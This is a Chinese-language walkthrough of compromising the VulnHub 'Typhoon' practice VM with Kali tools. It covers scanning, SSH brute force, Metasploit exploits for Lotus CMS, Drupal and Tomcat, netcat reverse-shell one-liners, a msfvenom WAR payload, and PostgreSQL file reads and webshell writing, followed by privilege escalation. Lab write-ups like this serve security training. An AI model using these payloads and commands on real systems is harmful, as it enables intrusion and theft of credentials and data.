kali渗透综合靶机(九)--Typhoon靶机
kali渗透综合靶机(九)--Typhoon靶机
靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/
一、主机发现
1.netdiscover -i eth0 -r 192.168.10.0/24,进过分析,确定192.168.10.162是目标靶机
二、端口扫描
1. masscan --rate=10000 -p0-65535 192.168.10.162
三、端口服务识别
1. nmap -sV -T4 -O -p 110,139,631,21,46818,56669,143,53,5432,60954,8080,27017,22,25,3306,445,54180,995,6379,111,2049,37214,80,993 192.168.10.162
或nmap -sV -p- -A 192.168.10.162
四、漏洞查找与利用
21端口(ftp)
nmap扫描可以匿名访问
浏览器访问,发现什么都没有
22端口(ssh)
发现ssh的版本是OpenSSH 6.6.1p1,存在用户名枚举漏洞,使用msf中的ssh枚举脚本(auxiliary/scanner/ssh/ssh_enumusers)
使用cewl收集页面可能是用户的信息,并添加几个常用的用户名,制作一个用户名字典
使用枚举用户脚本枚举用户
python 40136.py 192.168.10.162 -U user.txt
枚举出来用户名为vulnerablevm,www,admin,root,admin123
使用hydra破解密码
hydra -l admin -P /root/rockyou.txt ssh://192.168.10.162 -t 6,下图成功破解admin账户的密码metallica
尝试用admin账户ssh登录目标,登录成功
开始提权,提权方式与下面的提权方式一样
25端口(smtp)
发现开放25端口,版本为Postfix smtpd
使用smtp-user-enum 枚举用户名
smtp-user-enum -M VRFY -U user.txt -t 192.168.10.162,枚举出用户名admin
53端口(DNS ISC BIND9.9.5-3)
查看是否存在漏洞,发现dns版本存在拒绝服务漏洞
80端口(http Apache httpd 2.4.7)
1.扫描网站后台目录
1.1发现http://192.168.10.162/cms,尝试弱口令,失败
1.2漏洞库查找是否有对应的漏洞
1.3在kali中打开msfconsole,并使用了以下exp
1.4成功获得shell
1.5然后就是提权,提权方式有配置不当提权和内核提权
Drupal cms
2.1发现192.168.10.162/drupal/
2.2漏洞库查找是否有对应的漏洞
2.3在kali中打开msfconsole,并使用了以下exp
2.4设置参数
2.5开始攻击,成功获得shell
2.6接下开便是提权了,提权方式和之前的一样
1.3发现http://192.168.10.162/mongoadmin/
1.3.1发现是mondo的web管理页面,点击change database,出现如下
1.3.2点击creds,发现账户密码
1.3.3尝试用ssh登录,成功登陆
1.3.4查看系统版本以及内核版本
1.3.5在kali查看是否有对应的漏洞
1.3.6下载、编译、提权
1.3.7利用sudo提权,前提是已经获得当前普通用户的密码,并且当前用户属于sudo组,下图成功获得管理员权限
445端口
发现目标开放了445端口,使用enum4linux枚举目标共享信息
发现允许空账户、空密码登录,共享文件typhoon
远程挂载
mount -t cifs -o username='',password='' //192.168.10.162/typhoon /mnt
8080(http Apache Tomcat/Coyote JSP engine 1.1)
发现开放了8080,浏览器访问http://192.168.10.162:8080
dirb扫描http://192.168.10.162:8080
发现http://192.168.10.162:8080/manager/,提示需要输入密码
使用msf auxiliary/scanner/http/tomcat_mgr_login 破解tomcat用户名密码
成功获得tomcat用户名密码
使用获得的用户名登录,发现tomcat 的版本是Version 7.0.52
使用metasploit的一个模块tomcat_mgr_upload来尝试进行登录,利用成功,获得meterpreter会话
输入shell,发现当前shell不是交互式的shell,重新打开一个交互式的shell
python -c 'import pty;pty.spawn("/bin/bash")'
开始提权
1.1查看内核版本以及系统版本
1.2利用系统版本的漏洞,进行本地提权
2.利用配置不当进行提权
2.2 我们需要使用Msfvenom创建一个bash代码
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.10.151 lport=9999 R
2.3之后将上面生成的恶意代码在目标靶机系统中添加到script.sh文件
echo "mkfifo /tmp/ruoljay; nc 192.168.10.151 9999 0</tmp/ ruoljay | /bin/sh >/tmp/ ruoljay 2>&1; rm /tmp/ ruoljay " > script.sh
2.4在攻击端开启监听,目标端执行脚本,下图可以看到直接获得管理员权限
3.1用低权限用户将构造的命令写入script.sh,令文件调用以root身份运行的/bin/sh,然后反弹shell,就可以获得root权限了
Echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.151 8888 >/tmp/f;”>script.sh
3.2在kali攻击端监听,获得管理员权限
Tomcat的后台管理获取shell
http://192.168.10.162:8080/manager/html
1.msfvenom来生WAR文件
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.10.151 lport=5555 -f war -o evil.war
2.使用7z l evil.war 查看evulll.war具体内容
3.上传evil.war文件
4.攻击端监听,浏览器访问上传的恶意Web应用程序
http://192.168.10.162:8080/evil/wjsdgaavcuyf.jsp
5.这次攻击端获得反弹shell
6.接下来便是提权,方式和之前的一样。
5432(PostgreSQL)
1.使用auxiliary/scanner/postgres/postgres_login,尝试爆破PostgreSQL数据库用户名密码
2.成功爆破出来PostgreSQL用户名以及密码
3.登录数据库
psql -h 192.168.10.162 -U postgres
4.列下目录
5. 读取权限允许的文件
select pg_read_file('postgresql.conf',0,1000);
6.建表,并使用copy从文件写入数据到表
DROP TABLE if EXISTS MrLee;CREATE TABLE MrLee(t TEXT);COPY MrLee FROM '/etc/passwd';select * from MrLee limit 1 offset 0;
成功读取到了/etc/passwd第一行
7.直接读出所有数据
SELECT * FROM MrLee;
8.利用数据库写文件
INSERT INTO MrLee(t) VALUES('hello,MrLee');
COPY MrLee(t) TO '/tmp/MrLee';
SELECT * FROM MrLee;
显示里面有一句hello,MrLee,成功写入文件,并成功读取到源内容
9.写入木马
9.1创建OID,清空内容
SELECT lo_create(9999);
delete from pg_largeobject where loid=9999;
//创建OID,清空内容
9.2接下来就是写入木马了,使用hex
insert into pg_largeobject (loid,pageno,data) values(9999, 0, decode('.....', 'hex'));
10.菜刀连接
11.接下来就是提权了
总结:
1.信息收集、目录扫描、漏洞分析与利用
2.getshell方法
1.ssh爆破
2.lotus cms漏洞利用
3.Drupal cms漏洞利用
4.mongoadmin 数据库管理web页面查看用户名、密码
5.tomcat tomcat_mgr_upload漏洞
6.PostgreSQL未授权访问
3.提权方法
1.sudo提权
2.内核版本提权
3.利用配置不当进行提权
kali渗透综合靶机(九)--Typhoon靶机的更多相关文章
- kali渗透综合靶机(一)--Lazysysadmin靶机
kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...
- kali渗透综合靶机(十八)--FourAndSix2靶机
kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...
- kali渗透综合靶机(十七)--HackInOS靶机
kali渗透综合靶机(十七)--HackInOS靶机 靶机下载地址:https://www.vulnhub.com/hackinos/HackInOS.ova 一.主机发现 1.netdiscover ...
- kali渗透综合靶机(十六)--evilscience靶机
kali渗透综合靶机(十六)--evilscience靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --ra ...
- kali渗透综合靶机(十五)--Breach-1.0靶机
kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...
- kali渗透综合靶机(十四)--g0rmint靶机
kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一.主机发现 1.netdiscover - ...
- kali渗透综合靶机(十三)--Dina 1.0靶机
kali渗透综合靶机(十三)--Dina 1.0靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate= ...
- kali渗透综合靶机(十二)--SickOs1.2靶机
kali渗透综合靶机(十二)--SickOs1.2靶机 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/ 一.主机发现 1.netdiscover ...
- kali渗透综合靶机(十一)--BSides-Vancouver靶机
kali渗透综合靶机(十一)--BSides-Vancouver靶机 靶机下载地址:https://pan.baidu.com/s/1s2ajnWHNVS_NZfnAjGpEvw 一.主机发现 1.n ...
随机推荐
- 解决java导入project出现红叉
1.右击,import,选择需要导入的文件组. D:\softwar\seeyon\A8\ApacheJetspeed\webapps\seeyon\WEB-INF\lib 全选,打开,finish ...
- JS基础语法---练习:交换两个变量的值
* JavaScript简称为JS * JavaScript是什么? * 是一门脚本语言:不需要编译,直接运行 * 是一门解释性的语言:遇到一样代码就解释一行代码 * C#语言 ...
- Python当中的array数组对象
计算机为数组分配一段连续的内存,从而支持对数组随机访问:由于项的地址在编号上是连续的,数组某一项的地址可以通过将两个值相加得出,即将数组的基本地址和项的偏移地址相加.数组的基本地址就是数组的第一项的机 ...
- Android App自动更新解决方案(DownloadManager)
一开始,我们先向服务器请求数据获取版本 public ObservableField<VersionBean> appVersion = new ObservableField<&g ...
- swift(五)swift的函数
/** * 函数的定义和调用 */ func showIntegerArray(array:[Int]) { for a in array { println("\(a)") } ...
- 模仿UIApplication创建单例
UIApplicationMain: 1.创建UIApplication--应用程序唯一标识:可设置状态栏.识别联网状态.设置数字.打电话.发邮件.发短信.打开网页 2.创建UIApplication ...
- [b0028] python 归纳 (十三)_队列Queue在多线程中使用
# -*- coding: UTF-8 -*- """ 多线程同时读队列 总结: 1. 会阻塞 if self._jobq.qsize() > 0 进入逻辑,此时被 ...
- ORA-01555 When Max Query Length Is Less Than Undo Retention, small or 0 Seconds (Doc ID 1131474.1)
ORA-01555 When Max Query Length Is Less Than Undo Retention, small or 0 Seconds (Doc ID 1131474.1) A ...
- liteos MMU(十八)
1. 概述 1.1 基本概念 MMU全称"Memory Management Unit",顾名思义就是"内存管理单元". 1.2 运作机制 建立页表描述符号表, ...
- react中antd的表格自定义展开
antd的表格官方案例中给出的都是固定的图表展开,在做需求的时候,需要使用点击最后一列,然后出现展开内容,实现效果图如下 在最开始设置一个全局变量 const keys = [];在设置列参数的函数中 ...